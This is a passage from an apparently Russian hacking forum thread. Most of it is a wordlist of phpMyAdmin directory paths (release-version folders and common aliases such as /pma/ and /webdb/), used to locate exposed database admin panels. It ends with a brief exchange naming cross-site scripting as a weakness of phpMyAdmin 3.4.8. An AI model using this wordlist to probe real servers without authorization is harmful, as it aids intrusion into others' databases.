/phpmyadmin-RELEASE_3_3_8_1/
/phpmyadmin-RELEASE_3_3_8RC1/
/phpmyadmin-RELEASE_3_3_9/
/phpmyadmin-RELEASE_3_3_9_1/
/phpmyadmin-RELEASE_3_3_9_2/
/phpmyadmin-RELEASE_3_3_9RC1/
/phpmyadmin-RELEASE_3_4_0/
/phpmyadmin-RELEASE_3_4_0ALPHA1/
/phpmyadmin-RELEASE_3_4_0ALPHA2/
/phpmyadmin-RELEASE_3_4_0BETA1/
/phpmyadmin-RELEASE_3_4_0BETA2/
/phpmyadmin-RELEASE_3_4_0BETA3/
/phpmyadmin-RELEASE_3_4_0BETA4/
/phpmyadmin-RELEASE_3_4_0RC1/
/phpmyadmin-RELEASE_3_4_0RC2/
/phpmyadmin-RELEASE_3_4_1/
/phpmyadmin-RELEASE_3_4_10/
/phpmyadmin-RELEASE_3_4_10_1/
/phpmyadmin-RELEASE_3_4_10_2/
/phpmyadmin-RELEASE_3_4_10RC1/
/phpmyadmin-RELEASE_3_4_11/
/phpmyadmin-RELEASE_3_4_11_1/
/phpmyadmin-RELEASE_3_4_11RC1/
/phpmyadmin-RELEASE_3_4_1RC1/
/phpmyadmin-RELEASE_3_4_2/
/phpmyadmin-RELEASE_3_4_2RC1/
/phpmyadmin-RELEASE_3_4_3/
/phpmyadmin-RELEASE_3_4_3_1/
/phpmyadmin-RELEASE_3_4_3_2/
/phpmyadmin-RELEASE_3_4_3RC1/
/phpmyadmin-RELEASE_3_4_4/
/phpmyadmin-RELEASE_3_4_4RC1/
/phpmyadmin-RELEASE_3_4_5/
/phpmyadmin-RELEASE_3_4_5RC1/
/phpmyadmin-RELEASE_3_4_6/
/phpmyadmin-RELEASE_3_4_6RC1/
/phpmyadmin-RELEASE_3_4_7/
/phpmyadmin-RELEASE_3_4_7_1/
/phpmyadmin-RELEASE_3_4_7RC1/
/phpmyadmin-RELEASE_3_4_8/
/phpmyadmin-RELEASE_3_4_8RC1/
/phpmyadmin-RELEASE_3_4_9/
/phpmyadmin-RELEASE_3_4_9RC1/
/phpmyadmin-RELEASE_3_5_0/
/phpmyadmin-RELEASE_3_5_0ALPHA1/
/phpmyadmin-RELEASE_3_5_0BETA1/
/phpmyadmin-RELEASE_3_5_0RC1/
/phpmyadmin-RELEASE_3_5_0RC2/
/phpmyadmin-RELEASE_3_5_1/
/phpmyadmin-RELEASE_3_5_1RC1/
/phpmyadmin-RELEASE_3_5_2/
/phpmyadmin-RELEASE_3_5_2_1/
/phpmyadmin-RELEASE_3_5_2_2/
/phpmyadmin-RELEASE_3_5_2RC1/
/phpmyadmin-RELEASE_3_5_3/
/phpmyadmin-RELEASE_3_5_3RC1/
/phpmyadmin-RELEASE_3_5_4/
/phpmyadmin-RELEASE_3_5_4RC1/
/phpmyadmin-RELEASE_3_5_5/
/phpmyadmin-RELEASE_3_5_5RC1/
/phpmyadmin-RELEASE_3_5_6/
/phpmyadmin-RELEASE_3_5_6RC1/
/phpmyadmin-RELEASE_3_5_7/
/phpmyadmin-RELEASE_3_5_7RC1/
/phpmyadmin-RELEASE_3_5_8/
/phpmyadmin-RELEASE_3_5_8_1/
/phpmyadmin-RELEASE_3_5_8RC1/
/phpmyadmin-RELEASE_4_0_0/
/phpmyadmin-RELEASE_4_0_0ALPHA1/
/phpmyadmin-RELEASE_4_0_0ALPHA2/
/phpmyadmin-RELEASE_4_0_0BETA1/
/phpmyadmin-RELEASE_4_0_0BETA2/
/phpmyadmin-RELEASE_4_0_0RC2/
/phpmyadmin-RELEASE_4_0_0RC3/
/phpmyadmin-RELEASE_4_0_0RC4/
/phpmyadmin-RELEASE_4_0_1/
/phpmyadmin-RELEASE_4_0_10_1/
/phpmyadmin-RELEASE_4_0_10_2/
/phpmyadmin-RELEASE_4_0_10_3/
/phpmyadmin-RELEASE_4_0_10_4/
/phpmyadmin-RELEASE_4_0_10_5/
/phpmyadmin-RELEASE_4_0_10_6/
/phpmyadmin-RELEASE_4_0_10_7/
/phpmyadmin-RELEASE_4_0_10_8/
/phpmyadmin-RELEASE_4_0_10_9/
/phpmyadmin-RELEASE_4_0_1RC1/
/phpmyadmin-RELEASE_4_0_2/
/phpmyadmin-RELEASE_4_0_2RC1/
/phpmyadmin-RELEASE_4_0_3/
/phpmyadmin-RELEASE_4_0_3RC1/
/phpmyadmin-RELEASE_4_0_4RC1/
/phpmyadmin-RELEASE_4_1_14_2/
/phpmyadmin-RELEASE_4_1_14_3/
/phpmyadmin-RELEASE_4_1_14_4/
/phpmyadmin-RELEASE_4_1_14_5/
/phpmyadmin-RELEASE_4_1_14_6/
/phpmyadmin-RELEASE_4_1_14_7/
/phpmyadmin-RELEASE_4_1_14_8/
/phpmyadmin-RELEASE_4_2_10/
/phpmyadmin-RELEASE_4_2_10_1/
/phpmyadmin-RELEASE_4_2_11/
/phpmyadmin-RELEASE_4_2_12/
/phpmyadmin-RELEASE_4_2_13/
/phpmyadmin-RELEASE_4_2_13_1/
/phpmyadmin-RELEASE_4_2_13_2/
/phpmyadmin-RELEASE_4_2_6/
/phpmyadmin-RELEASE_4_2_7/
/phpmyadmin-RELEASE_4_2_7_1/
/phpmyadmin-RELEASE_4_2_8/
/phpmyadmin-RELEASE_4_2_8_1/
/phpmyadmin-RELEASE_4_2_9/
/phpmyadmin-RELEASE_4_2_9_1/
/phpmyadmin-RELEASE_4_3_0/
/phpmyadmin-RELEASE_4_3_0ALPHA1/
/phpmyadmin-RELEASE_4_3_0BETA1/
/phpmyadmin-RELEASE_4_3_0RC1/
/phpmyadmin-RELEASE_4_3_0RC2/
/phpmyadmin-RELEASE_4_3_1/
/phpmyadmin-RELEASE_4_3_10/
/phpmyadmin-RELEASE_4_3_11/
/phpmyadmin-RELEASE_4_3_11_1/
/phpmyadmin-RELEASE_4_3_12/
/phpmyadmin-RELEASE_4_3_13/
/phpmyadmin-RELEASE_4_3_2/
/phpmyadmin-RELEASE_4_3_3/
/phpmyadmin-RELEASE_4_3_4/
/phpmyadmin-RELEASE_4_3_5/
/phpmyadmin-RELEASE_4_3_6/
/phpmyadmin-RELEASE_4_3_7/
/phpmyadmin-RELEASE_4_3_8/
/phpmyadmin-RELEASE_4_3_9/
/phpmyadmin-RELEASE_4_4_0ALPHA1/
/phpmyadmin/
/phpmyadmin_/
/phpMyAdmin_/
/phpmyadmin_1/
/phpMyAdmin_1/
/phpMyAdmin1/
/phpmyadmin123/
/phpmyadmin2/
/phpMyAds/
/pma/
/PMA/
/pma1/
/pma2005/
/PMA2005/
/sqlmanager/
/sqlweb/
/web/phpMyAdmin/
/webadmin/
/webdb/
/websql/
 
Ответить с цитированием

  #39  
Старый 20.10.2015, 15:31
xivi00
Guest
Сообщений: n/a
Провел на форуме:
11341

Репутация: 0
По умолчанию

phpmyadmin 3.4.8 есть ли что нибудь под это?
 
Ответить с цитированием

  #40  
Старый 20.10.2015, 17:16
WallHack
Guest
Сообщений: n/a
Провел на форуме:
61136

Репутация: 32
По умолчанию

Цитата:
Сообщение от xivi00  
xivi00 said:

phpmyadmin 3.4.8 есть ли что нибудь под это?
Cross-Site-Scripting
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов it's my Веб-уязвимости 361 24.10.2019 10:25
[ Обзор уязвимостей PHP-Nuke ] [53x]Shadow Веб-уязвимости 43 04.02.2012 20:33
[ Обзор уязвимостей e107 cms ] Nightmarе Веб-уязвимости 100 15.01.2011 19:48
ОБЗОР УЯЗВИМОСТЕЙ БЕСПЛАТНЫХ ПОЧТОВЫХ СЕРВИСОВ nike57 Уязвимости Mail-сервис 4 05.05.2006 22:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ